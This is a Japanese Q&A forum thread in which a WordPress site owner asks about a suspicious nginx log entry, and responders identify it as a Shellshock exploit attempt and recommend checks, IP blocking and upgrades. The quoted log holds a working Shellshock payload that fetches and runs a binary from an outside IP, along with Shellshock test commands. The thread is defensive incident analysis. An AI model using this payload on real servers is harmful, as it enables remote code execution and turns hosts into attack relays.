nginxで動作しているWordPressサイトのアクセスログに不審なログがある。

【環境】
＝＝＝＝＝
AWS EC2
nginx/1.6.2
PHP 5.3.29
WordPress 4.1.1
＝＝＝＝＝

現在、AWS上にてWordPressのブログサイトを利用しています。

昨日、アクセスログを確認したところ、以下のようなログがありました。
/bin/bashやechoコマンドといったものが書かれていたので、踏み台にされていたりしないか不安になり、質問させていただきました。

以下のログはどういったものになるのでしょうか。
もしお分かりになる方がいましたら、お教えいただけますでしょうか。

もし何かの攻撃だとしたら、どういったことを行おうとしているものなのでしょうか。

【ログ】

117.21.191.209 - - [01/Apr/2015:11:13:47 +0900] "GET / HTTP/1.1" 200 35509 "() { :; }; /bin/bash -c \x22rm -rf /tmp/;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"

行動規範の内容に同意します

回答3件

いわゆる ShellShock 脆弱性を狙ったものです。リファラーとユーザーエージェントに攻撃用のコードが埋め込まれています。

投稿2015/04/03 08:01

ngyuki

総合スコア4514

teketeke

2015/04/03 08:56

ytgrsua4様の方へコメントさせていただきましたが、改めてコメントを書かせていただきます。このサイトの使い方がいまいちわかっていないので、こういったコメントの書き方がまずかったら御指摘頂けると助かります。現在の環境のbashはupdateもなかったので、ShellShock対応済みだと思ったのですが、何か対策はあるのでしょうか。以下確認したことです。 ----- $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test ※メッセージが表示される ----- $ env var='() {(a)=>\' bash -c "echo date"; cat echo date cat: echo: No such file or directory ----- # bash --version GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu) Copyright (C) 2009 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software; you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. ----- # rpm -qa bash bash-4.1.2-15.24.amzn1.x86_64 -----

ngyuki

2015/04/03 12:29

別の回答のコメントにあるように、既に ShellShock の対応をされているのであればそんなに気にする必要はないと思います（どうせいろんなところからその種のアクセスは来るものなので）。

teketeke

2015/04/06 12:33

コメントありがとうございます。＞どうせいろんなところからその種のアクセスは来るものなので確かに中国、韓国とかからへんなアクセスがなくならないんですよね。今回のShellShockの件については、あまり気にしないようにいたします。 ※引き続きアクセス制限は定期的にやっていくつもりです。

行動規範の内容に同意します

ベストアンサー

はじめまして。
ザックリまとめると

117.21.191.209:9645から不正なプログラムをダウンロードする命令をRun.shに書き込む
それらを実行する命令をRun.shに書き込む
最後にRun.shも削除する様にRun.shに書き込む
Run.shの権限を777にする
Run.shを実行する

といった流れかと思います。
念のため/tmp/China.Z-jztp8が無いか/tmp/Run.shが無いか確認しておくとよいかと思います。

※一部修正しました

投稿2015/04/03 08:00

編集2015/04/03 08:55

toaruhetare

総合スコア141

teketeke

2015/04/03 08:37

確認したところ、/tmp/China.Z-jztp8と/tmp/Run.shが無いことを確認しました。ちなみに、現在の環境のbashはupdateもなかったので、ShellShock対応済みだと思ったのですが、何か対策はあるのでしょうか。以下確認したことです。 ----- $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" this is a test ※メッセージが表示される ----- $ env var='() {(a)=>\' bash -c "echo date"; cat echo date cat: echo: No such file or directory ----- # bash --version GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu) Copyright (C) 2009 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software; you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. ----- # rpm -qa bash bash-4.1.2-15.24.amzn1.x86_64 -----

toaruhetare

2015/04/03 09:07

Amazon Linuxの修正版bashはbash-4.1.2-15.21.amzn1だそうなので、そのバージョンであれば対応済みだと思われます。 ShellShockに対応しているのであればあまり気を張る必要はないかと思いますが、少なくとも攻撃を行ってきたIPからのアクセスは拒否するのがいいかと思います。また今回の件と直接関係ないですが、PHP5.3はサポートが終了しているので出来うる限りサポートされているバージョンに切り替える方ことをおすすめします。

teketeke

2015/04/03 11:49

>ShellShockに対応しているのであればあまり気を張る必要はないかと思いますが、少なくとも攻撃を行ってきたIPからのアクセスは拒否するのがいいかと思います。そうですね。アクセス制限は行おうと思います。 PHPのバージョンについても、早めに切り替えたいと思います。

行動規範の内容に同意します

まさしく攻撃ですね。外部のサイトから攻撃用スクリプトをダウンロードさせて実行させる。
つまり、あなたのWebサーバが、他のサーバを攻撃するための踏み台になってしまうわけです。
(攻撃が成功したかどうかは、これを見てもわかりませんが。)

投稿2015/04/03 07:40